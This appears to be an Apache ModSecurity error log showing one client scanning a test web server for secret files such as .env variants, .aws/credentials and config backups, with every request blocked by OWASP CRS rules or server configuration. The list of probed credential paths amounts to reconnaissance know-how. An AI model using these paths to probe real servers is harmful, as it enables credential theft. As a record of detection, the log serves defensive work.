[Sun Nov 30 12:32:45.223822 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSwrXXJWCyvffcL8eFn6uAAAACc"]
[Sun Nov 30 12:32:45.224107 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSwrXXJWCyvffcL8eFn6uAAAACc"]
[Sun Nov 30 12:32:45.224386 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aSwrXXJWCyvffcL8eFn6uAAAACc"]
[Sun Nov 30 12:32:45.951361 2025] [:error] [pid 427786] [client 195.178.110.68:22260] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSwrXZBT9WRpgHN-yZ_ivgAAADM"]
[Sun Nov 30 12:32:45.951575 2025] [:error] [pid 427786] [client 195.178.110.68:22260] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSwrXZBT9WRpgHN-yZ_ivgAAADM"]
[Sun Nov 30 12:32:45.951766 2025] [:error] [pid 427786] [client 195.178.110.68:22260] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSwrXZBT9WRpgHN-yZ_ivgAAADM"]
[Sun Nov 30 12:32:46.771721 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aSwrXnJWCyvffcL8eFn6uQAAACc"]
[Sun Nov 30 12:32:46.771969 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aSwrXnJWCyvffcL8eFn6uQAAACc"]
[Sun Nov 30 12:32:46.772184 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aSwrXnJWCyvffcL8eFn6uQAAACc"]
[Sun Nov 30 12:32:46.891284 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aSwrXnJWCyvffcL8eFn6ugAAACc"]
[Sun Nov 30 12:32:46.891522 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aSwrXnJWCyvffcL8eFn6ugAAACc"]
[Sun Nov 30 12:32:46.891753 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aSwrXnJWCyvffcL8eFn6ugAAACc"]
[Sun Nov 30 12:32:47.066430 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aSwrX3JWCyvffcL8eFn6uwAAACc"]
[Sun Nov 30 12:32:47.066649 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aSwrX3JWCyvffcL8eFn6uwAAACc"]
[Sun Nov 30 12:32:47.066845 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aSwrX3JWCyvffcL8eFn6uwAAACc"]
[Sun Nov 30 12:32:48.460006 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSwrYLgfOLI1G9pbljch3QAAAAA"]
[Sun Nov 30 12:32:48.460225 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSwrYLgfOLI1G9pbljch3QAAAAA"]
[Sun Nov 30 12:32:48.460409 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSwrYLgfOLI1G9pbljch3QAAAAA"]
[Sun Nov 30 12:32:48.488978 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aSwrYLgfOLI1G9pbljch3gAAAAA"]
[Sun Nov 30 12:32:48.489209 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aSwrYLgfOLI1G9pbljch3gAAAAA"]
[Sun Nov 30 12:32:48.489386 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aSwrYLgfOLI1G9pbljch3gAAAAA"]
[Sun Nov 30 12:32:48.673359 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aSwrYLgfOLI1G9pbljch3wAAAAA"]
[Sun Nov 30 12:32:48.673587 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aSwrYLgfOLI1G9pbljch3wAAAAA"]
[Sun Nov 30 12:32:48.673794 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aSwrYLgfOLI1G9pbljch3wAAAAA"]
[Sun Nov 30 12:32:48.951974 2025] [:error] [pid 427776] [client 195.178.110.68:7576] [client 195.178.110.68] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /home/user/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aSwrYBlsVScx5wrU222RZgAAACk"]
[Sun Nov 30 12:32:48.952206 2025] [:error] [pid 427776] [client 195.178.110.68:7576] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aSwrYBlsVScx5wrU222RZgAAACk"]
[Sun Nov 30 12:32:48.952512 2025] [:error] [pid 427776] [client 195.178.110.68:7576] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/user/.aws/credentials"] [unique_id "aSwrYBlsVScx5wrU222RZgAAACk"]
[Sun Nov 30 12:32:51.487531 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aSwrY3JWCyvffcL8eFn6vAAAACc"]
[Sun Nov 30 12:32:51.487767 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aSwrY3JWCyvffcL8eFn6vAAAACc"]
[Sun Nov 30 12:32:51.487955 2025] [:error] [pid 427773] [client 195.178.110.68:56310] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aSwrY3JWCyvffcL8eFn6vAAAACc"]
[Sun Nov 30 12:32:51.919562 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSwrY7gfOLI1G9pbljch4QAAAAA"]
[Sun Nov 30 12:32:51.919785 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSwrY7gfOLI1G9pbljch4QAAAAA"]
[Sun Nov 30 12:32:51.919987 2025] [:error] [pid 427744] [client 195.178.110.68:22300] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSwrY7gfOLI1G9pbljch4QAAAAA"]
[Sun Nov 30 12:32:52.930181 2025] [authz_core:error] [pid 427789] [client 195.178.110.68:7604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Sun Nov 30 12:33:01.216610 2025] [authz_core:error] [pid 421120] [client 195.178.110.68:7634] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sun Nov 30 12:33:02.611777 2025] [authz_core:error] [pid 421120] [client 195.178.110.68:7634] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Nov 30 12:33:03.160044 2025] [:error] [pid 421120] [client 195.178.110.68:7634] [client 195.178.110.68] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSwrb11RgwzjQxTFQvL82AAAAAg"]
[Sun Nov 30 12:33:03.160290 2025] [:error] [pid 421120] [client 195.178.110.68:7634] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSwrb11RgwzjQxTFQvL82AAAAAg"]
[Sun Nov 30 12:33:03.160568 2025] [:error] [pid 421120] [client 195.178.110.68:7634] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSwrb11RgwzjQxTFQvL82AAAAAg"]
[Sun Nov 30 12:33:03.160867 2025] [:error] [pid 421120] [client 195.178.110.68:7634] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSwrb11RgwzjQxTFQvL82AAAAAg"]
[Sun Nov 30 12:33:04.807527 2025] [:error] [pid 427776] [client 195.178.110.68:18342] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSwrcBlsVScx5wrU222RZwAAACk"]
[Sun Nov 30 12:33:04.807751 2025] [:error] [pid 427776] [client 195.178.110.68:18342] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSwrcBlsVScx5wrU222RZwAAACk"]
